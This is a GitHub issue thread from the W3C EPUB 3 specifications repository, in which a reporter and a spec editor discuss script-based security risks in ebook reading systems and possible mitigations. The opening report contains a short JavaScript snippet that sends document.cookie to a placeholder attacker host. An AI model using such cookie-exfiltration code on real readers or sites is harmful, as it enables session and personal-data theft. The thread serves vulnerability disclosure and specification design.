w3c / epub-specs

Shared workspace for EPUB 3 specifications.

Scripting: SECURITY: Trojan Vulnerability #91

Closed GoogleCodeExporter closed 9 years ago

GoogleCodeExporter commented 9 years ago
I have found a way to include a trojan in an EPUB 3 document.

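  <script>
    // Build an image whose URL carries the reader's cookies to a remote server.
    var heehee = document.createElement('img');
    heehee.src = "http://<evilhackerz>.org/steal.asp?x=" + encodeURIComponent(document.cookie);
    // Append to the root element: a document node cannot take a second element child.
    document.documentElement.appendChild(heehee);
  </script>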

Original issue reported on code.google.com by josephpe...@gmail.com on 21 Feb 2011 at 9:45

GoogleCodeExporter commented 9 years ago
Could you clarify a bit? What exactly is being stolen here? What do you expect
to see in document.cookie, other than the cookies that scripts in the evil
document itself would set?

Original comment by soroto...@gmail.com on 24 Feb 2011 at 9:42

GoogleCodeExporter commented 9 years ago
In the case of any browser-based ebook reader, like Booki.sh or Google 
Editions: the works. Session data, personally identifying information, etc. 
This content has to be run in a trusted context, but if scripting is allowed by 
the spec, the content can't be trusted. Cookies are just one vulnerability.

Original comment by joseph%i...@gtempaccount.com on 24 Feb 2011 at 10:25

GoogleCodeExporter commented 9 years ago
Well, the spec does not require EPUB implementors to use the same domain for
their book-viewing app and for serving book content. And scripting is only
truly needed in embedded content (such as inside an iframe).

An implementation can choose to serve unmodified non-spine content from, say,
acme-evil.com, and the book-viewing app code plus spine content with scripts
removed from acme-good.com. That seems like a valid way to implement the spec.
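
A minimal sketch of that split, assuming a hypothetical `planServing` helper
and an assumed item shape of `{ href, inSpine }` (neither comes from the spec).
It only decides which origin a resource is served from and whether scripts
should be stripped first; the stripping itself is left out.

```javascript
// Hypothetical origins, named after the example domains in the comment above.
const TRUSTED_ORIGIN = "https://acme-good.com";   // viewer app + script-free spine content
const UNTRUSTED_ORIGIN = "https://acme-evil.com"; // unmodified, possibly scripted content

// Decide where a publication resource is served from.
// `item` is an assumed shape: { href: string, inSpine: boolean }.
function planServing(item) {
  if (item.inSpine) {
    // Spine documents share the viewer's origin, so scripts must be removed.
    return { url: `${TRUSTED_ORIGIN}/${item.href}`, stripScripts: true };
  }
  // Everything else is served untouched from the untrusted origin.
  return { url: `${UNTRUSTED_ORIGIN}/${item.href}`, stripScripts: false };
}

console.log(planServing({ href: "chapter1.xhtml", inSpine: true }));
console.log(planServing({ href: "widgets/quiz.xhtml", inSpine: false }));
```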

Another way to go is to do something similar to what LiveJournal does: it
creates a separate domain for each user. In this case, one would create a
domain for each book.

If it is the case that the spec is implementable securely, then I think these 
issues are just bugs in specific implementations, not problems in the spec.

Original comment by soroto...@gmail.com on 25 Feb 2011 at 6:07

GoogleCodeExporter commented 9 years ago
Yes, that's exactly how Booki.sh works: one domain per book, e.g.
http://audacity-of-hope-5c2708.reading.booki.sh

The problem is that if you serve content in an iframe from another domain, the 
same origin policy prevents the reading system from accessing the DOM and 
execution environment of the iframe.
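
To make the restriction concrete, here is a rough sketch of the comparison a
browser effectively performs. Two URLs share an origin only if scheme, host and
port all match. The `sameOrigin` helper and the `reader.example` address are
assumptions for illustration; only the per-book URL comes from this thread.

```javascript
// Two URLs are same-origin only when scheme, host and port all match.
function sameOrigin(a, b) {
  return new URL(a).origin === new URL(b).origin;
}

const readerUrl = "http://reader.example/"; // hypothetical reading-system origin
const bookUrl = "http://audacity-of-hope-5c2708.reading.booki.sh/";

// Different hosts: the reader cannot touch the book iframe's DOM.
console.log(sameOrigin(readerUrl, bookUrl));
// Same host, different path: still the same origin.
console.log(sameOrigin(bookUrl, bookUrl + "chapter-1"));
```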

This to me is the primary issue with "container-constrained" scripts. Obviously 
it's not as calamitous as spine-level scripts, but I think it's problematic to 
specify that the reading system serve content it can't even access or share 
session/cookie/running state with.

The secondary issue is the same-origin policy running in the other direction:
an iframe served from another domain can't read its parent's DOM at all, so the
model in the spec (where the DOM of the parent is visible but immutable) can't
be implemented as written. I have a little more on that topic here:
http://blog.booki.sh/blog/post/epub-3-0-and-scripted-content-documents 

Original comment by joseph%i...@gtempaccount.com on 25 Feb 2011 at 6:31

GoogleCodeExporter commented 9 years ago
First, thank you for looking into this. Let's see if we can reach a
conclusion.

I do not think you *have* to provide access to the iframe's parent. If I
remember correctly, the spec just lists restrictions that should be followed if
you do. So splitting content between a trusted and an untrusted domain seems
sufficient. Yes, embedded scriptable content will be opaque to your reading
app, but you don't need that access to implement the spec, right?

Now, check my logic for the per-book domain approach, which is more complex.
The advantage is that there are no unexpected access restrictions. The
disadvantage is that your viewing application becomes wide open to potentially
evil book scripts, and you have to worry about things like cookies being
stolen. (Other parts of your app can still be hidden; only the viewing portion
has to be protected against abuse.) I think that as long as you can sneak some
private key (or a session ID) from your server to your client-side code, it
should be workable: you can make cookies opaque, encrypt them, or store
everything of value on the server. Sneaking in that initial key can be done,
for instance, by including it in your app markup, removing it from the DOM, and
storing it in a JavaScript variable in a private scope that only your code can
access.
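
The private-scope idea might look roughly like the sketch below. The names
`createSignedSender` and `X-Session-Key` are hypothetical, and reading the key
out of the markup and deleting that node is assumed to have happened before the
call. The key is reachable only through the closure; whether that holds up
against a hostile script sharing the page is a separate question.

```javascript
// Keep the session key in a closure instead of a cookie or a global.
// `send` is an assumed transport callback: (path, headers) => result.
function createSignedSender(sessionKey, send) {
  // `sessionKey` is never exposed as a property of the returned function.
  return function signedSend(path) {
    return send(path, { "X-Session-Key": sessionKey });
  };
}

// Usage with a stand-in transport that just records what it was given.
const sent = [];
const signedSend = createSignedSender("k-123", (path, headers) => {
  sent.push({ path, headers });
  return "ok";
});

console.log(signedSend("/bookmarks"));  // the transport's return value
console.log(signedSend.sessionKey);     // no such property on the function
```

Note that a book script able to call `signedSend` could still issue signed
requests, so this hides the key's value rather than the capability.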

One note: while web-based Reading Systems are important, most of the Reading 
Systems today are not web-based, so these issues get attention only from a 
handful of members.

Original comment by soroto...@gmail.com on 26 Feb 2011 at 7:41

GoogleCodeExporter commented 9 years ago
On the first point, the draft currently says:

"An executing script may have read access to the DOM of its parent Content 
Document, but the Reading System must not allow it to modify that DOM, nor 
other content in the Publication."

You're right, the RS need not provide access to the parent. I think it'd be 
better if the spec said "must not have access to the scripting environment or 
DOM of its parent document", since that would bring it into conformance with 
standard JavaScript security models. Probably a minor point.

I agree that you don't need access into iframe internals to implement the spec. 
We would consider implementing off-domain sandboxing of container-constrained 
scripts in Booki.sh, if it made the spec. It's still not clear how these would 
work consistently across reading systems from an interaction model perspective, 
but from a security perspective I'm less troubled by them.

As for JavaScript in the spine-level documents, I don't believe that per-book 
domains give you any additional comfort. We've implemented them for caching 
reasons, not security reasons. You're right that you can make cookies "secure" 
on https domains, you can mark them as read-only in some browsers, and you can 
encrypt them. You also make a good case about using some of the scoping 
features of JS to hide personal or system information. I think the continually 
improving introspection powers of JS engines will thwart that. JS engines 
simply aren't designed to provide black box security.
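
For reference, a small sketch of the cookie hardening mentioned above, assuming
the server sets the cookie and that "read-only" maps to the `HttpOnly`
attribute, which hides a cookie from `document.cookie` entirely. The
`buildSessionCookie` helper is hypothetical.

```javascript
// Build a Set-Cookie header value for a session cookie.
// Secure: sent over HTTPS only. HttpOnly: not visible to document.cookie.
function buildSessionCookie(name, value) {
  return [
    `${name}=${encodeURIComponent(value)}`,
    "Path=/",
    "Secure",
    "HttpOnly",
  ].join("; ");
}

console.log(buildSessionCookie("sid", "abc 123"));
```

This keeps the cookie value out of reach of the `document.cookie` trick in the
original report, but a script running on the same origin can still make
requests that carry the cookie.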

None of this makes me at all comfortable with enabling scripting in the Reading 
System execution environment — there are too many vectors of attack. You're 
up against hackers capable of this sort of ingenuity: 
http://ha.ckers.org/xss.html

I apologise for repeating myself, but I really can't understand why the WG is 
flirting with potential accusations of trojan vulnerabilities when there's been 
almost no public experimentation with scripting in reading systems. Why aren't 
we doing this in labs and on Github before we do this in the spec?

Anyway, thanks for discussing these issues Peter; much appreciated.

Original comment by joseph%i...@gtempaccount.com on 2 Mar 2011 at 12:44

GoogleCodeExporter commented 9 years ago

Original comment by markus.g...@gmail.com on 8 Mar 2011 at 10:00

GoogleCodeExporter commented 9 years ago
A new section, "2.4.4 Security Considerations", was added to the spec to bring
security issues to the attention of content developers. We do not mandate a
specific implementation path, as that would differ too much between Reading
Systems.

Original comment by soroto...@gmail.com on 19 Apr 2011 at 7:18